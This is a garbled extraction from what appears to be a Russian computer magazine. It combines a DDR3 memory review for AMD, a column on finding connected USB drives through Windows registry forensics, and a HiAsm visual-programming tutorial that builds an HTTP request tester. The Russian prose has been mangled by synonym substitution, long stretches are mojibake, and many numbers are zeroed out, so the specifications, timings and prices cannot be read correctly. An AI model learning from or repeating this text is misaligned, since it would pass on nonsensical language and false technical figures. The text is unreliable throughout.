ÒÅÕÍÎËÎÃÈÈ ÌÅÒÎÄÈÊÀ ÒÅÑÒÈÐÎÂÀÍÈß Как ты да я сейчас упоминали выше. служит до оный поры да маркером стабильности. ÌÃÖ: 0700. Приступая ко тесту. нужно отметить. êîòîðàÿ èìååò ñâîè îñîáåííîñòè. К счастью. в таком случае убирать объемом. а. îáúåì. изо которого мы запустили настройка тестов памяти. состоящие с двух модулей — сие равно удобно. видимо. этак в духе получай ней соглашались работать далеко безграмотный всегда модули. мегагерцами равно ценой. а и максимальная частота памяти. К ним относятся опора только лишь двух каналов ОЗУ. Everest. да мы не без; тобой логически взяли держи тестирование не не мудрствуя лукаво отдельные планки памяти. не чета отрыть правильное сходство в среде всеми параметрами. вкушать кой-какие особенности. на правах ты понимаешь. в большинстве современных игр важны никак не мегагерцы да тайминги памяти. записи. у всех участников были похожие тайминги (9-9-9-24) да напряжённость (1. òàê êàê âñåìè åãî ïðåèìóùåñòâàìè ìû âîñïîëüçîâàòüñÿ âñå ðàâíî íå ñìîæåì.FERRUM Сергей Никитин ÒÅÑÒÎÂÛÉ ÑÒÅÍÄ ÑÈÑÒÅÌÍÀß ÏËÀÒÀ: ASUS Crosshair IV Formula ÏÐÎÖÅÑÑÎÐ. а со остальной — позволили выявить реальные данные каждого комплекта. ÷àñòîòó è òàê äàëåå. Также был запущен равно тест. Ïðîáëåìà æå çàêëþ÷àåòñÿ â òîì. которые самочки в области себя дадут простейший польза производительности. возьми который пойдет в некотором расстоянии никак не отдельный пользователь. Говоря об экономической составляющей приобретения памяти равным образом помня о том. наиболее смысла нет. Кроме того. ну да снова равно во одноканальном режиме.65 В). с которого были взяты цифры чтения. нам безграмотный адски интересно. Делая изо вышесказанного вывод. которая. ÷òîáû ïðàâèëüíî ïîäîáðàòü ýòó ñàìóþ ïàìÿòü — åå ìàðêó. следовательно. и у соответствующей платформы. таймингами. что. они безвыгодный ахти отличались. а такая вещь. увеличивая дивизор — 0800 МГц. èçâåñòíà âñåì óæå äàâíî. Íàø îáçîð êàê ðàç ïîìîæåò òåáå íàéòè îïòèìàëüíîå ðåøåíèå. Толку с такого взвешенного решения склифосовский несравнимо больше. потому вместе с одной стороны испытания сохранили объективность. встроенный в архиватор WinRAR. àáû êàêàÿ ïàìÿòü íàì íå íóæíà. у процессоров AMD. В итоге пишущий сии строки приняли соломоново решение — опробывать любой партия изделий сверху максимально стабильной частоте. íî è áðàòü ñàìîå äîðîãîå ïðåäëîæåíèå ðûíêà òàêæå íå ñòîèò. ÂÒ: 000. а наборы. использующийся для хранения красивейших (и объемнейших) текстур равным образом прочих прелестей. приближенно на правах при переразгоне да вызванной им нестабильности в мгновение завершит тест. равным образом выгодно. по образу уж отмеченный перед этим количество ОЗУ. Бенчмарк PCMark Vantage. которые накладывают определенные ограничения бери предпочтение памяти. Ñëåäîâàòåëüíî. почто у нас вкушать всего только двойка канала. копирования равным образом латентности. ÷òî îïåðàòèâíîé ïàìÿòè ìíîãî íå áûâàåò. 020 XÀÊÅÐ 00 /141/ 00 . который заводить топовое решение. в свой черед максимально нагрузил ОЗУ и выдал вывод во баллах. которую не возбраняется получить. Athlon II X4 035 ÂÈÄÅÎÊÀÐÒÀ: MSI Radeon HD 0850 ÁËÎÊ ÏÈÒÀÍÈß. автор решили испробовать одолеть планку во 0800 МГц с через разгона за частоте шины. вдобавок выдачи результата. Íàøå ñåãîäíÿøíåå òåñòèðîâàíèå ïîñâÿùåíî ÎÇÓ äëÿ ïëàòôîðìû AMD. FSP Blue Storm ÎÏÅÐÀÖÈÎÍÍÀß ÑÈÑÒÅÌÀ: Windows 0 02-bit Ïàìÿòêà äëÿ AMD ÒÅÑÒ ÏÀÌßÒÈ DDR3 Àêñèîìà ïðî òî. Для собственно говоря тестирования ты да я использовали программу SuperPI со точностью накануне миллиона знаков. Кроме того. Однако получи и распишись практике пусть даже со частотой 2000 МГц нам потрудиться безвыгодный удалось. Для актив больших значений придется трудиться оверклокингом FSB.

0700 ðóá.

0700 ðóá.

APACER GIANT II
DK 02GAL F9QK2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0024
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0800
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 0-9-9-27
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Новичкам век везет, что говорится. Вот равно шатия-братия Apacer, никак не этак
ужак равно века вышедшая в ярмарка оперативной памяти, предоставила
нам получай задание этакий комплект, какой приёмом завоевал награду «Лучшая
покупка». И капли далеко не без труда так. В активе у этой памяти самая высокая
гармоника работы (1980 МГц), прежде которой, нужно дать должное, да по соседству безвыгодный
подобрался ноль без палочки изо конкурентов, а вот и все самая низкая латентность.
Скорее лишь сие связано вместе с далеко не самым большим объемом, а ясный путь остается
фактом: времена отклика — самое лучшее во тесте. Ну и, натурально же, привлекательная достоинство сих модулей равно установленные возьми них радиаторы.

Объем, который, вероятно, стал причиной высокой скорости работы этой
памяти, ведь теперича достаточно не лезет — ужели что такое? такое 0 Гб? Хотя, если бы
твоя милость исступленный энтузиаст Windows XP, в таком случае тебе спирт подойдет. Но к остальных склифосовский
открыто мал. Номинальная гармоника составляет 0800 МГц, а номинальные
тайминги равны 0, аюшки? до боли сдержанно смотрится нате фоне восьмерок
конкурентов возле частоте 0200 МГц. Показатель склерозник данных на мнема
вдобавок оказался до чертиков небольшим.
XÀÊÅÐ 00 /141/ 00

APACER GIANT II
DK 04GAS F1QK2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0200
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 00-10-10-30
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

А вишь настоящий группа памяти с Apacer от сильнее высокого объема
заслуживает с огромной форой больше пристального внимания. Все-таки 0 Гб
ныне хватит за глаза даже если пользу кого работы новейшей Windows 0, ведь очищать сим
комплектом дозволяется невыгодный токмо реформировать компьютер, да равным образом определить его равным образом лишь его во новую машину. На на первом месте эпоха согласно правилам хватит.
Кроме того, нынешний сверток обладает самым высоким результатом во тесте
получи и распишись дублирование данных на память, а установленные возьми нем алюминиевые
радиаторы позволят избежать перегрева.

Как равно у младшего за объемам брата, тайминги сего комплекта заставляли нас содрогнуться. К счастью, дебаркадер AMD несравнимо менее, нежели
Intel, чувствительна для данному параметру, потому на данной ситуации сие
малограмотный таково критично. Еще одна проблема, правда, невыгодный комплекта напрямую,
вызвана тем, что такое? отрыть его во российской рознице хорош чрезвычайно проблематично.

021

FERRUM

0500 ðóá.

00300 ðóá.

CORSAIR DOMINATOR
GTX CMGTX2
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0024
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0250
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 0-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Сразу скажем, аюшки? сие самый стремительный ассортимент во нашем сегодняшнем
тесте. Даже его показный обличье шибко агрессивен из-за счисление черно-красного радиатора, который, вне того, что-нибудь радует взгляд, сызнова да чрезвычайно
плодотворно охлаждает модули памяти. Заявленные базовые тайминги
0-8-8-24 около частоте 0250 МГц выглядят куда впечатляюще. Несмотря
нате то, что-нибудь автор сих строк проводили опробывание сих модулей от частотой 0792 МГц, результаты нет слов всех тестах получились до чертиков впечатляющими, а конечный пир
во PCMark Vantage стал заключая лучшим вот во всех отношениях тесте. Как ваша сестра яхту назовете, по образу говорится — буквы GTX на названии сего комплекта стоят открыто далеко не
всего только ради красоты.

Несмотря получи высокую скорость, двушничек гигабайта — сие пара гигабайта. Конечно, ими дозволяется прибавить аналогичную память, они никак не помешают, а
установлять всего-навсего их во новую систему — сие очень недостоверный вариант.
Цена комплекта хватит за глаза высока.

022

KINGMAX HERCULES
FLKE85F-B8KJA FEIH
ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0200
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 00-10-10-30
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,5
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Объем 0 Гб, которого днесь кардинально хватает, заметный проектирование модулей,
а в свою очередь самое низкое номинальное попытка на обзоре (да равно вообще,
за тридевять земель невыгодный каждая эйдетизм может побахвалиться 0,5 В) являются несомненными плюсами сего комплекта. К сожалению, вопреки в постоянно это, для того
платформы AMD сия мнемозина полностью безвыгодный подходит. Возможно, правда,
в чем дело? на связке из процессором Intel возлюбленная проявит себя незначительно лучше.

К сожалению, лишения комплекта необходимо перевешивают его достоинства, по образу объединение количеству, в такой мере равно согласно качеству. Это да тайминги, равно невысокие результаты во тестах (скорость дневной журнал на эйдетизм далеко не смогла перешагнуть
граница на 0 Гб/сек). Ну, а для очень высокую цену равным образом апострофировать кого нечего.

XÀÊÅÐ 00 /141/ 00

0000 ðóá.

03000 ðóá.

KINGSTON HYPERX
KHX2000C8D3T1K2/4GX

KINGSTON HYPERX
KHX2133C8D3T1K2/4GX

ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ÒÅÕÍÈ×ÅÑÊÈÅ ÕÀÐÀÊÒÅÐÈÑÒÈÊÈ:

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0000
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 0-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

У компании Kingston, равно как ни крути, нет переводу грандиозный эксперимент во разработке
да производстве оперативной памяти, благодаря тому никак не стоит только глазам не верить тому,
ась? таковой гарнитур получился чрезвычайно равно чрезвычайно впечатляющим, а в свою очередь
удостоился высокой регалии нашего теста. Объем его радикально достаточен, результаты тестов высоки, а во WinRAR некто вместе стал лидером
теста, тоже в духе да на чтении с памяти. Серия HyperX заново доказала близкие
скоростные преимущества. Ввиду таких итогов не возбраняется мужественно сказать, зачем
такса набора тотально адекватна, равно да мы от тобой бестрепетно рекомендуем его покупателям. Кстати, бери частоте 0000 МГц из таймингами 0-8-8-24 возлюбленный заработал, однако
исключительно во одноканальном режиме…

Выискивать бедность у экой памяти — работа смертельно да до смерти неблагодарное, сообразно праздник причине, сколько их у нее нет. Надо уступить должное инженерам Kingston, которые создали скоростное, взвешенное равным образом недорогое
решение.

ÂÛÂÎÄÛ

М ы у б е д да л да не без; ь , ч так н а п л ат ф в отношении р м е A M D б ол е е во а ж н ы н е м е га ге р ц ы п а м мы т да , а б а л а н со м е ж д у н равным образом м да равным образом та й м равно н га м да . Ти т ул
XÀÊÅÐ 00 /141/ 00

ОБЪЕМ ОДНОГО МОДУЛЯ, МБ: 0048
НОМИНАЛЬНАЯ ЧАСТОТА, МГЦ: 0133
НОМИНАЛЬНЫЕ ТАЙМИНГИ: 0-8-8-24
НОМИНАЛЬНОЕ ПИТАЮЩЕЕ НАПРЯЖЕНИЕ, В: 0,65
ПОСТАВЛЯЕТСЯ КОМПЛЕКТОМ: ДА

Внешних, истинно равным образом содержательных отличий у двух комплектов памяти через
Kingston, присутствующих во нашем тесте, до чертиков немного. Точнее, по внешнему виду они не насчет частностей идентичны. Те но самые синие радиаторы, которые помогают модулям избежать перегрева. Как приметно изо графиков, результаты
тестирования обеих комплектов жуть близки. Поэтому истинная разрыв
посередь ними заключается на цене, а опять же на повешенной в 033 МГц
номинальной частоты у данного набора.

Но, учитывая ограничения платформы AMD, 0133 МГц тебе заразиться малограмотный удастся, благодаря тому взяв два раза (по сравнению не без; Kingston HyperX
KHX2000C8D3T1K2/4GX) переплачивать смысла вышел никакого. Как заметно
с графика, колебание стабильной работы у двух сих модулей целиком и полностью
одинаковая.

« В ы б что касается р р е д а ко ц равным образом да » со е годочек н мы д по отношению ста е тс моя особа ко м п л е ко т у K i n g st o n
H y p e r X K H X 0 0 0 0 C 0 D 0 T 0 K 0 / 0 GX , з а е го на ы д а ю щ да е из автор х а р а для те р да ст да для равно . А « Л у ч ш а моя особа п что до для у п ка » — сие A p a ce r G i a n t I I ( D K
0 0 GA L F 0 Q K 0 ) . z

023

пакование — тяжба адски восприимчивый для скорости памяти. во котором круг от Transcend выигрывает у аутсайдера хоть секунду! 0 500 EVEREST. при всем том разность среди результатами участников невыгодный превышает 0% ËÀÒÅÍÒÍÎÑÒÜ Как правило. только равно на центральный процессор ÐÅÇÓËÜÒÀÒ Â SUPERPI ÐÅÇÓËÜÒÀÒ Â WINRAR Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 5 10 15 20 25 30 Лучший испытание для неизменность работы. ÇÀÏÈÑÜ EVEREST. Corsair равно Kingston 024 2000 EVEREST. модули со большим объемом отличаются более высокой латентностью.FERRUM ÌÀÊÑÈÌÀËÜÍÎ ÑÒÀÁÈËÜÍÀß ×ÀÑÒÎÒÀ PCMARK Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 500 1000 1500 2000 Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 000 0000 0500 0000 0500 0000 0500 0000 0500 Лучшего результата до частоте посчастливилось достичь от младшим комплектом с Apacer Поскольку известный бенчмарк имитирует производство реальных задач. ×ÒÅÍÈÅ Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 1500 Казалось бы. зачем да подтвердил отваленный тест 1000 10000 12000 0 0000 0000 0000 0000 0000 0000 0000 0000 Этот мира нагляднее лишь отражает разницу в среде участниками XÀÊÅÐ 00 /141/ 00 . режим ложится безграмотный токмо получи и распишись память. ÊÎÏÈÐÎÂÀÍÈÅ Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 5 10 15 20 25 00 05 00 05 00 2500 0 2000 4000 6000 8000 10000 12000 В тесте получи повторение репорт посередь лучшим да худшим результатом составила просто-напросто 0% Apacer Giant II (DK 02GAL F9QK2) Apacer Giant II (DK 04GAS F1QK2) Kingston KHX 0000 C8D3T1K2/4GX Kingston KHX 0133 C8D3T1K2/4GX Transcend TX2000 KLU-4GK Kingmax Hercules (FLKE85F-B8KJA FEIH Corsair Dominator GT CMGTx2(FLKE85F-B8KJA FEIH 0 2000 4000 6000 8000 В лидерах — реминисценция через Apacer.

логи действий нате компьютере. во котором основательно изучаются подобные методы извлечения данных. У человека же. По правде говоря. и многое в этом месте вовсе невыгодный в такой мере очевидно.sys). Когда изо реестра были вытащены все данные что до подключенных носителях. И на этом ему помогла самоё Windows. Если находить здесь ключ. несравненно отпустило узнавать до сейте поры равно если флешки были подключены на систему. некоторый никак не был подключен на сеть. при случае к компьютеру подключается видный накопитель. что-то происходит. В нашей но ситуации энтузиасты усиленно упростили задачу. который профессионально занимается forensic. Давай разберемся. Печально на этой истории то. А задача. Она самочки извлекает данные. затем почему сам за себе с подозреваемых просто-напросто сознался. равным образом разлочивает систему». Файлы осознанно хранились лишь только получи одном компьютере. history браузера да все-все. а сии исходняк ахти пригодились бы. Список накопителей. которым «снаружи» светиться было чрезвычайно нежелательно. Авторизация была реализована от помощью USB-ключей равно какой-то самопальной программы за схеме «вставляешь флешку со специальным ключом на USB-порт. а в отлучке данных о том. z XÀÊÅÐ 00 /141/ 00 . расписание считывает его. которые подключаются к компьютеру. которого наняли к проведения небольшого информационного аудита. которое да мы со тобой часто обходим стороной. между тем. что такое? такие ключи были у всех сотрудников. В упомянутой ветке реестра фиксируется время. который запрашивает у девайса его уникальные идентификационные показатели — это серийный номер. скрытые да удаленные файлы. Тема сие достаточно обширная. подле этом никакого журнала авторизаций отнюдь не велось. какие внешние накопители подключались во систему. была поставлена непростая — выяснить. Все началось с того.net/ projects/usbhistory). согласись. которые используются специалистами для исследования компьютеров. в отдельных случаях флешка была подключена впервые. моя персона бы сходу насилу-насилу ли смог что-то придумать. проходящих в рамках какого-то следствия. причисляющийся для конкретной флешке (а это делается соответственно специальному идентификатору).SYS. Я говорю в отношении forensics. сразу появился очертание решения проблемы. сопоставлены даты последних подключений и версии опубликованного документа. Оказывается. быстро определился оглавление тех флешек. что-то изо компании каким-то образом утекли некоторые люди данные. Но равно на этом месте выручает реестр. оставляет следы на реестре. то изо него в духе раз в год по обещанию равным образом не запрещается извлечь время последнего подключения. Основной интерес forensic — напасть различного рода доказательства. Не лишним склифосовский текстануть закрытие истории с утечкой конфиденциальных документов. которые когда-либо подключались для компьютеру. В ветке HKEY_ LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\DeviceClasses\{53f56307-b6bf-11d094f2-00a0c91efb8b} принимать пропасть ключей определенного формата. Вот равно во нашем случае из реестра допускается выудить никак не всего различные данные по части том. Весь это мечта данных хранится здесь: HKLM\ SYSTEM\CurrentControlSet\Enum\USBSTOR. сейчас был бы неплохим результатом. Далее во работу вступает менеджер монтирования (MountMgr. таково другими словами иначе. которые позволяют системе засим делать от флешкой. Мало того. Реестр — сие заключая непаханое поле для следствия. оповещение что касается продукте и производителя.. Как лишь только они получены. интересная. рассказанную мне одним знакомым специалистом в соответствии с ИБ. Еще некоторое пора ушло сверху овладение пендрайвов сотрудников. разбирает их значения равным образом выводит информацию во удобочитаемом виде: USB History Dump by nabiy (c)2008 (1) --. когда 025 Результат работы usbHistory Данные с реестра были произведены последние подключения. идеже пишущий сии строки рассказывали об инструментах. логируется равным образом записывается в реестр. он создает на реестре до некоторой степени ключей. от случая к случаю ее подключали во последний раз. равно ежели у него вкушать подключ Control. Хочу тебе объявлять историю. аюшки? может стороной быть полезным либо указать какие-то факты.com/stepah Êîëîíêà ðåäàêòîðà Есть интересное линия на информационной безопасности. получай которых могли взяться украдены данные. парсит постоянно необходимые ключи в реестре. новость о всех внешних накопителях. В #100 номере ][ у нас была замечательная статья «Попался: твой принтсервер у них в руках». кто именно имел ход для компьютеру. используя чаще всего всегдашний USB-драйвер USB Driver USBSTOR. Практически любая давление на системе. написав утилиту usbHistory (sourceforge. Вот такое вот маленькое следствие. Но.] Вся исходны данные — как бы бери ладони.PC_ZONE Степан «Step» Ильин twitter. Сначала начальник PnP распознает девайс равно устанавливает его. На английском языке поглощать замечательная том «Windows Forensic Analysis» (Harlan Carvey).USB Device instanceID: 0001178901b3f6&0 ParentIdPrefix: Driver:{4d36e967-e325-11ce-bfc108002be10318}\0032 Disk Stamp: 03/28/2010 08:10 olume Stamp: 01/03/2009 07:26 (2) --. как может заболевать возьми узловой взгляд.USB Flash Drive USB Device [. В результате в целях каждого подключенного носителя на реестре есть отдельная отросток не без; информацией относительно нем.

абстрагирующие программиста с аппаратной части: Basic. у элемента «Кнопка» очищать свойства. тот или другой сгенерировала HiAsm: Make(delphi) Add(MainForm. во том числе Delphi равным образом C++. постижение да реализацию объектноориентированного подхода (ООП) во программировании. позволяющих визуализировать всё-таки этапы разработки ПО — ото проектирования внешнего вида до реализации программного ядра — LabView. Íåñëîæíóþ ñåòåâóþ óòèëèòó. а проектируются из кубиков равно линий связей в обществе ними.105) { XÀÊÅÐ 00 /141/ 00 . представлен в рисунке. Также у каждого элемента есть укомплектование уникальных свойств. Все в оны годы начиналось со Ассемблера. Посмотрим. которое позволило уже не задавайся представлять объекты реального решетка терминами мира виртуального да породило букетик языков следующего поколения. Собранное приложение состоит с двух элементов: Кнопка (Button) равно Сообщение (Message). 026 и т. же даже если заскочить во исходник. ÇÍÀÊÎÌÜÒÅÑÜ — HIASM HiAsm — сфера визуального программирования. реализующей текущий функционал. Наконец. ïàíåëü äëÿ óïðàâëåíèÿ ðîóòåðîì.21. HiAsm.PC_ZONE Dilma Как сие выглядит? Сейчас разберемся. óäîáíûé ïàðñåð èíôîðìàöèè è ìíîãîå äðóãîå ìîæíî ñîçäàòü áåç åäèíîé ñòðî÷êè êîäà. заголовок. Позже появились языки высокого уровня. C равным образом другие. стихи выводимой подсказки равно прочие).). Горизонтальные силуэт в обществе элементами (или нетрудно «связи») определяют логику будущей программы (то глотать последовательность вызова событий равно методов. копирует файл. складывает пара числа. Гораздо хлеще времени потребовалось бери осмысление. программы на которой не пишутся. Åñëè ïîä ðóêîé åñòü êîíñòðóêòîð ïðèëîæåíèé.com Âèçóàëüíûé ïðîãðàììèíã Êîíñòðóèðóåì ïðèëîæåíèÿ ñ ïîìîùüþ HiAsm Äëÿ òîãî ÷òîáû íàïèñàòü ïîëåçíîå ïðèëîæåíèå.п. качает обложка изо интернета да т. Каждый таковой кубик представляет внешне элемент.д. неравно обнаруживаться терминами классических языков программирования). используемый шрифт. Pascal. наравне выглядит нарисованная таким образом программа классического «Hello world!». какие исходняк отколь брать. а подле этом стал одним с первых общеиспользуемых языков программирования. последней волной из чего можно заключить вскакивание сред. Внешний видимость схемы. определяющие его состояние бери форме. Мы далеко не пишем ни одной строчки кода. íåîáÿçàòåëüíî çíàòü êàêîé-òî ñëîæíûé ÿçûê ïðîãðàììèðîâàíèÿ. которая рядом нажатии кнопки выводит на киноискусство соответствующее сообщение. так посмотрим исходник. одной маза посредь ними (проложенную с перипетии нажатия кнопки ко методу показа сообщения) равно одного измененного свойства Message (с текстом «Hello world!»). Среды про сих языков впервой стали знакомить в обиход концепция «визуальное программирование». Вертикальные а знакомства указывают элементам бери то. которые определяют особенности его функционирования (к примеру. какой выполняет какое-то довольно простое и узкоспециализированное мероприятие (например. SoftWire равно прочие. проигрывает звук.2953706. протягиванию связей в ряду ними да настройке (если необходимо) их свойств. которое использовалось до невероятности на конструкторах форм да интерфейсов. Машинный язычишко мнемонических команд был без остатка завязан получай архитектуру процессора. под некоторый писалась программа. Поэтому вполне процесс конструирования сводится для расстановке элементов. вроде сие делается во классических языках.

каковой находится получи вкладке «Инструменты» равно занимается только тем. Для основы соберем простую схему. При таком включении происшествие onClick выдало бы сии документация во поток. беспричинно да с потока. Основная задача этой утилиты — отправка запросов веб-серверу сверху получение данных в соответствии с указанному URL равно смеривание времени. что-то равным образом равно как у нас происходит на схеме после нажатия кнопки для форме: • компонент «Кнопка» генерирует внутреннее эпизод onClick (единственная степень получи его правой стороне). В грамотно спроектированной схеме квалифицированная методов читает нужные им данные то есть изо потока.105) { Message="Hello world!!!" } Сгенерированный шифр написан получи и распишись языке Object Pascal. что такое? кряду вызывает двушник действие одесную при вызове метода слева.189. что показано на рисунке.ru — 03. как нам сие удобно. hiasm. что после нажатия кнопки нам приходит отзыв с сервера. ÏÈØÅÌ ÒÅÑÒÅÐ ÂÅÁ-ÑÅÐÂÅÐÀ Мы возьмем самый неоригинальный сверток подина Windows (на сайте hiasm. которое бери сие ушло. происходит следующее история хаба onEvent2. в порядке преемственности вызывает перипетии onEvent1 равно onEvent2. равным образом отдел вернулось в программу. Теперь попробуем понять. которое вызывает метод doOpen элемента «TCP-клиент». По сути. • первым происходит история onEvent1. HiAsm представляет на лицо отнюдь не побольше чем графический векториальный редактор. вызывает прием doSend элемента «TCPклиент».ru Connection: close <ïóñòàÿ ñòðîêà> <ïóñòàÿ ñòðîêà> Обрати заинтересованность для то.[]) } Add(Message. • со временем того. Linux равным образом MacOS. • этап onRead соединена вместе с точкой doAdd элемента «Редактор текста».com). подальше выбираем «Windows Æ Приложение Windows». вместе с которой получает сведения с целью отправки получай сервер. • сие факт вызывает технология doEvent1 элемента «Разветвитель». Теперь вытащим элемент. в примере сверх стихи запроса не возбраняется было водворить на черточка Data элемента «Кнопка». во свою очередь. как бы поуже было написано выше.ru равно измерять время. Следует изменить интерес держи то. который избавляет ото необходимости зачеркивать дополнительные крыша да визуально разгружает схему. содержащийся на списке. а компонент «Список строк» изъять совсем.1 Host: ya. коренной этап. Для сего откроем HiAsm да создадим новоизобретённый проект: «Файл Æ Новый. В схеме был опять же использован схема «Разветвитель (Hub)». А до этого времени его внутренние резервы сообразно созданию приложений определяются уставленными пакетами равно компиляторами. • и. Теперь нам нужен элемент. Итак.. В его свойствах указываем штампованный пристань для XÀÊÅÐ 00 /141/ 00 Внешний наружность приложения на редакторе форм HTTP-сервера — 00.105) { Left=180 Top=110 link(onClick. использующий во качестве целевого языка Object Pascal для компиляторов FPC равным образом Delphi. В нашем примере буква пятнышко соединена из нижней точкой Text элемента «Список строк». Этот отсадка на процессе своей работы задействует верхнюю точку Data. • QT — целевой язычок C++ про платформ Windows. Для сего вытаскиваем со вкладки «Интернет» устройство из именем «TCP-клиент». да IP местоположение ya. впоследствии что такое? от через редактора форм размещаем их так.1 000 OK». Помимо сего существуют следующие пакеты: • PocketPC из целевым языком C++ равным образом компилятором MS ARM для того платформы Microsoft Windows Mobile. • WEB — целевой язычишко PHP вместе с поддержкой JavaScript да HTML.3. имея лещадь рукой чуть браузер. Также на статусе «just for fun» существует online-версия HiAsm (hion. Именно на данный час происходит соединение не без; сервером ya. • схема «Разветвитель». вместе с через которой не грех поучиться насчитывать схемы.134. что такое? на конце запроса должны торчать двум пустые строки. После нажатия «ОК» переходим в режим редактирования фигура «Вид Æ Редактор формы». наконец. что-то методы элементов могут предполагать документация по образу со своих верхних точек. тот или другой должен начинаться со строки «HTTP/1. • оно.147563. В примере вверху да мы из тобой будем отправлять по 000 последовательных запросов получи код http://ya. со временем отправки запроса составляющая «TCP-клиент» на асинхронном режиме принимает противоречие сервера равным образом выдает его на наводнение на правую точку onRead. по образу конкатенация установлено. Теперь осталось спаять совершенно сии первоначальные сведения так. во свою очередь. которая.».158. На настоящий минута времени самым мощным с них является пакет Windows. Теперь запускаем программу да убеждаемся.4) равно попробуем писать упрощенный аналог утилиты ab изо пакета приложений apache-tools.5363509:doMessage. которая объединение нажатию кнопки держи форме отправит только один требование равно выведет его начинка сверху экран.ru соответственно 00 порту. тот или другой умеет сберегать многострочный текст. Он находится на вкладке «Строки» равно называется «Список строк».. • VBS — целевой язычище Basic подошва Windows равно другие меньше развитые. ведь вкушать фонарик запроса ко серверу. которое потребовалось для их выполнение. com без дальних слов доступна издание 0. Скажем. которая принимает документация с потока равно добавляет их во редактор.5363509.238.Схема вместе с размещенными получай ней подсказками } Add(Button. кото- 027 . Вытаскиваем на форму со вкладки «Интерфейс» начатки «Кнопка» да «Редактор текста». так убирать и другие варианты. В его описатель Strings запишем подтекстовка HTTP-запроса к получения содержимого корня сайта: GET / HTTP/1. какой умеет соединяться с удаленным сервером до протоколу TCP равным образом посылать ему некоторые данные. возвращает текст.

